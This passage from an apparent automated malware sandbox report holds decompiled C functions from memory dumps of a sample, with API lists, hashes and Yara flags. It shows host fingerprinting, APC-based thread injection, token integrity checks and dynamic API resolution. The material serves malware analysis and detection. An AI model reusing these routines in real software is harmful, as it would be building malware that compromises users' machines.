                                                                                                                                                                                                                                  • Part of subcall function 00A92932: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04FD9370,00000000,?,747DF710,00000000,747DF730), ref: 00A92981
                                                                                                                                                                                                                                  • Part of subcall function 00A92932: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04FD93A8,?,00000000,30314549,00000014,004F0053,04FD9364), ref: 00A92A1E
                                                                                                                                                                                                                                  • Part of subcall function 00A92932: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A9A080), ref: 00A92A30
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A9A17F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3521023985-2342693527
                                                                                                                                                                                                                                • Opcode ID: 61a711c163c5cfcf66b40abd94d5b3a5d0eab775c4935de4ffd4b2648cf41048
                                                                                                                                                                                                                                • Instruction ID: ebc393c5512d607de9feadc957c8b1a42d6971c7db580f39ee7a473b3a735119
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61a711c163c5cfcf66b40abd94d5b3a5d0eab775c4935de4ffd4b2648cf41048
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A55148B1A01228ABDF11DFE5DD44DEEBFB8EF19720F204216F414E6190DB309A85CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 69%
                                                                                                                                                                                                                                			E00A61210(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				struct _FILETIME* _v16;
                                                                                                                                                                                                                                				short _v60;
                                                                                                                                                                                                                                				struct _FILETIME* _t14;
                                                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                                                				long _t18;
                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                                                                                				long _t32;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t31 = __edx;
                                                                                                                                                                                                                                				_t14 =  &_v16;
                                                                                                                                                                                                                                				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                				_push(0x192);
                                                                                                                                                                                                                                				_push(0x54d38000);
                                                                                                                                                                                                                                				_push(_v12);
                                                                                                                                                                                                                                				_push(_v16);
                                                                                                                                                                                                                                				L00A62160();
                                                                                                                                                                                                                                				_push(_t14);
                                                                                                                                                                                                                                				_v16 = _t14;
                                                                                                                                                                                                                                				_t15 =  *0xa641c4;
                                                                                                                                                                                                                                				_push(_t15 + 0xa6505e);
                                                                                                                                                                                                                                				_push(_t15 + 0xa65054);
                                                                                                                                                                                                                                				_push(0x16);
                                                                                                                                                                                                                                				_push( &_v60);
                                                                                                                                                                                                                                				_v12 = _t31;
                                                                                                                                                                                                                                				L00A6215A();
                                                                                                                                                                                                                                				_t18 = _a4;
                                                                                                                                                                                                                                				if(_t18 == 0) {
                                                                                                                                                                                                                                					_t18 = 0x1000;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t19 = CreateFileMappingW(0xffffffff, 0xa641c8, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                                                                				_t34 = _t19;
                                                                                                                                                                                                                                				if(_t34 == 0) {
                                                                                                                                                                                                                                					_t32 = GetLastError();
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                						if(_t22 == 0) {
                                                                                                                                                                                                                                							_t32 = GetLastError();
                                                                                                                                                                                                                                							if(_t32 != 0) {
                                                                                                                                                                                                                                								goto L9;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							 *_a8 = _t34;
                                                                                                                                                                                                                                							 *_a12 = _t22;
                                                                                                                                                                                                                                							_t32 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t32 = 2;
                                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                                						CloseHandle(_t34);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t32;
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00A610DD,0000000A,?,?), ref: 00A6121D
                                                                                                                                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A61233
                                                                                                                                                                                                                                • _snwprintf.NTDLL ref: 00A61258
                                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,00A641C8,00000004,00000000,?,?), ref: 00A6127D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A610DD,0000000A,?), ref: 00A61294
                                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00A612A8
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A610DD,0000000A,?), ref: 00A612C0
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00A610DD,0000000A), ref: 00A612C9
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A610DD,0000000A,?), ref: 00A612D1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1724014008-1084903527
                                                                                                                                                                                                                                • Opcode ID: b67768f2784ab679300b9bc682dc60dc773125a73d3d5b700a0161079bfd811f
                                                                                                                                                                                                                                • Instruction ID: fb2d3ca41b9889a11dd006553324bac63735576d07232c965d54c28672b30366
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b67768f2784ab679300b9bc682dc60dc773125a73d3d5b700a0161079bfd811f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45219DB2A00108BFDB10EFB4CC94EEE7BB8EB58350F194535F606E7190D67099468B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A91DF5(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				struct _FILETIME* _v12;
                                                                                                                                                                                                                                				short _v56;
                                                                                                                                                                                                                                				struct _FILETIME* _t12;
                                                                                                                                                                                                                                				intOrPtr _t13;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t27 = __edx;
                                                                                                                                                                                                                                				_t12 =  &_v12;
                                                                                                                                                                                                                                				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                                                                				_push(0x192);
                                                                                                                                                                                                                                				_push(0x54d38000);
                                                                                                                                                                                                                                				_push(_v8);
                                                                                                                                                                                                                                				_push(_v12);
                                                                                                                                                                                                                                				L00A9AEBA();
                                                                                                                                                                                                                                				_push(_t12);
                                                                                                                                                                                                                                				_v12 = _t12;
                                                                                                                                                                                                                                				_t13 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                				_t5 = _t13 + 0xa9e876; // 0x4fd8e1e
                                                                                                                                                                                                                                				_t6 = _t13 + 0xa9e59c; // 0x530025
                                                                                                                                                                                                                                				_push(0x16);
                                                                                                                                                                                                                                				_push( &_v56);
                                                                                                                                                                                                                                				_v8 = _t27;
                                                                                                                                                                                                                                				L00A9ABDA();
                                                                                                                                                                                                                                				_t17 = CreateFileMappingW(0xffffffff, 0xa9d2e4, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                                                                				_t30 = _t17;
                                                                                                                                                                                                                                				if(_t30 == 0) {
                                                                                                                                                                                                                                					_t28 = GetLastError();
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                						if(_t21 == 0) {
                                                                                                                                                                                                                                							_t28 = GetLastError();
                                                                                                                                                                                                                                							if(_t28 != 0) {
                                                                                                                                                                                                                                								goto L6;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							 *_a4 = _t30;
                                                                                                                                                                                                                                							 *_a8 = _t21;
                                                                                                                                                                                                                                							_t28 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t28 = 2;
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						CloseHandle(_t30);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t28;
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00A95790,?,?,4D283A53,?,?), ref: 00A91E01
                                                                                                                                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A91E17
                                                                                                                                                                                                                                • _snwprintf.NTDLL ref: 00A91E3C
                                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,00A9D2E4,00000004,00000000,00001000,?), ref: 00A91E58
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A95790,?,?,4D283A53), ref: 00A91E6A
                                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00A91E81
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A95790,?,?), ref: 00A91EA2
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A95790,?,?,4D283A53), ref: 00A91EAA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1814172918-1701360479
                                                                                                                                                                                                                                • Opcode ID: 3a7adf8fbde7bcb20469b6727302bfba22fdd028e7576b66af21a63404d5a657
                                                                                                                                                                                                                                • Instruction ID: feae8621fdc51cca5dbc0158c192c3563ed27b793ef86c3177f57b51e78c3164
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a7adf8fbde7bcb20469b6727302bfba22fdd028e7576b66af21a63404d5a657
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D21D272B40205FBDB11DBA4DC45FAE37F9AF84710F204122FA05E7190DA7099068B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E00A99DE1(char __eax, void* __esi) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                				signed int _v28;
                                                                                                                                                                                                                                				long _t34;
                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                				long _t50;
                                                                                                                                                                                                                                				char _t59;
                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                				void* _t64;
                                                                                                                                                                                                                                				char _t65;
                                                                                                                                                                                                                                				intOrPtr* _t67;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t69 = __esi;
                                                                                                                                                                                                                                				_t65 = __eax;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_v12 = __eax;
                                                                                                                                                                                                                                				if(__eax == 0) {
                                                                                                                                                                                                                                					_t59 =  *0xa9d2a8; // 0xd448b889
                                                                                                                                                                                                                                					_v12 = _t59;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t64 = _t69;
                                                                                                                                                                                                                                				E00A94E13( &_v12, _t64);
                                                                                                                                                                                                                                				if(_t65 != 0) {
                                                                                                                                                                                                                                					 *_t69 =  *_t69 ^  *0xa9d2dc ^ 0x46d76429;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                                                                					_t50 = _v8;
                                                                                                                                                                                                                                					if(_t50 != 0) {
                                                                                                                                                                                                                                						_t62 = RtlAllocateHeap( *0xa9d270, 0, _t50 + _t50);
                                                                                                                                                                                                                                						if(_t62 != 0) {
                                                                                                                                                                                                                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                                                                								_t64 = _t62;
                                                                                                                                                                                                                                								 *_t69 =  *_t69 ^ E00A9680B(_v8 + _v8, _t64);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							HeapFree( *0xa9d270, 0, _t62);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t61 = __imp__;
                                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                				_t34 = _v8;
                                                                                                                                                                                                                                				if(_t34 != 0) {
                                                                                                                                                                                                                                					_t68 = RtlAllocateHeap( *0xa9d270, 0, _t34 + _t34);
                                                                                                                                                                                                                                					if(_t68 != 0) {
                                                                                                                                                                                                                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                                                                							_t64 = _t68;
                                                                                                                                                                                                                                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00A9680B(_v8 + _v8, _t64);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						HeapFree( *0xa9d270, 0, _t68);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				asm("cpuid");
                                                                                                                                                                                                                                				_t67 =  &_v28;
                                                                                                                                                                                                                                				 *_t67 = 1;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                                                                                                                                				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                                                                				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                                                                				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                                                                                                                                				return _t39;
                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00A99E18
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A99E2F
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00A99E3C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A9587F), ref: 00A99E5D
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A99E84
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A99E98
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A99EA5
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A9587F), ref: 00A99EC3
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3239747167-1536154274
                                                                                                                                                                                                                                • Opcode ID: 979486572fe78d0f23a065ca4cdb92179ca3c2b64ef2c3314fb0250a9c24dbd1
                                                                                                                                                                                                                                • Instruction ID: f756a8f96d9e24147243b2e14c8e6784d4057828bc0aab08c2e64a79648b9286
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 979486572fe78d0f23a065ca4cdb92179ca3c2b64ef2c3314fb0250a9c24dbd1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E131B5B1B00209EFDB10DFA9DD81AAEB7F9EB48310F11446AE505D3220EB30EE469B51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A61000(long _a4, DWORD* _a12) {
                                                                                                                                                                                                                                				_Unknown_base(*)()* _v0;
                                                                                                                                                                                                                                				void* _t4;
                                                                                                                                                                                                                                				long _t6;
                                                                                                                                                                                                                                				long _t11;
                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0xa641c0, 0, _a12); // executed
                                                                                                                                                                                                                                				_t13 = _t4;
                                                                                                                                                                                                                                				if(_t13 != 0) {
                                                                                                                                                                                                                                					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                                                                					if(_t6 == 0) {
                                                                                                                                                                                                                                						_t11 = GetLastError();
                                                                                                                                                                                                                                						TerminateThread(_t13, _t11);
                                                                                                                                                                                                                                						CloseHandle(_t13);
                                                                                                                                                                                                                                						_t13 = 0;
                                                                                                                                                                                                                                						SetLastError(_t11);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t13;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateThread.KERNEL32 ref: 00A61017
                                                                                                                                                                                                                                • QueueUserAPC.KERNEL32(?,00000000,?), ref: 00A6102C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00A61037
                                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 00A61041
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A61048
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00A61051
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 3832013932-1084903527
                                                                                                                                                                                                                                • Opcode ID: 3508558dc8a1efc315014345f44063a74777dd55e35eef4b59970adb0854f870
                                                                                                                                                                                                                                • Instruction ID: 2026f9fbc0fbcf23d50a736f384ba3da691300979b55b3a6aa388dba705e3461
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3508558dc8a1efc315014345f44063a74777dd55e35eef4b59970adb0854f870
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF08233205660BBDB229BE0AC0CF6BBF78FB08752F060504F70590060C7A18A4F9BA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A959B4(long* _a4) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void _v16;
                                                                                                                                                                                                                                				long _v20;
                                                                                                                                                                                                                                				int _t33;
                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v16 = 1;
                                                                                                                                                                                                                                				_v20 = 0x2000;
                                                                                                                                                                                                                                				if( *0xa9d294 > 5) {
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                                                                                                                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                                                                                                                						_v8 = 0;
                                                                                                                                                                                                                                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                						if(_v8 != 0) {
                                                                                                                                                                                                                                							_t46 = E00A95157(_v8);
                                                                                                                                                                                                                                							if(_t46 != 0) {
                                                                                                                                                                                                                                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                                                                                                                								if(_t33 != 0) {
                                                                                                                                                                                                                                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								E00A953BB(_t46);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						CloseHandle(_v12);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				 *_a4 = _v20;
                                                                                                                                                                                                                                				return _v16;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00A959E6
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00A95A06
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00A95A16
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A95A66
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00A95A39
                                                                                                                                                                                                                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00A95A41
                                                                                                                                                                                                                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00A95A51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1295030180-0
                                                                                                                                                                                                                                • Opcode ID: 0d3591ec6ef1d048fb382e90b4630968d2eb7d475fecfe49debcc4393548c319
                                                                                                                                                                                                                                • Instruction ID: b636fcceeaa96a4077f432f70ca1382723b63c91bce9ce0afb98c6bb68804939
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d3591ec6ef1d048fb382e90b4630968d2eb7d475fecfe49debcc4393548c319
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A211B75A00209BFEF01DFA4DD89DAEBBB9EF04344F100166E511A7161CB714A46DB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A61C61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t56 = E00A62020(0x20);
                                                                                                                                                                                                                                				if(_t56 == 0) {
                                                                                                                                                                                                                                					_v8 = 8;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t50 = GetModuleHandleA( *0xa641c4 + 0xa65014);
                                                                                                                                                                                                                                					_v8 = 0x7f;
                                                                                                                                                                                                                                					_t29 = GetProcAddress(_t50,  *0xa641c4 + 0xa65151);
                                                                                                                                                                                                                                					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                					if(_t29 == 0) {
                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                						E00A61F0A(_t56);
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t33 = GetProcAddress(_t50,  *0xa641c4 + 0xa65161);
                                                                                                                                                                                                                                						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                						if(_t33 == 0) {
                                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t36 = GetProcAddress(_t50,  *0xa641c4 + 0xa65174);
                                                                                                                                                                                                                                							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                							if(_t36 == 0) {
                                                                                                                                                                                                                                								goto L8;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t39 = GetProcAddress(_t50,  *0xa641c4 + 0xa65189);
                                                                                                                                                                                                                                								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                								if(_t39 == 0) {
                                                                                                                                                                                                                                									goto L8;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t42 = GetProcAddress(_t50,  *0xa641c4 + 0xa6519f);
                                                                                                                                                                                                                                									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                									if(_t42 == 0) {
                                                                                                                                                                                                                                										goto L8;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t56 + 8)) = _a8;
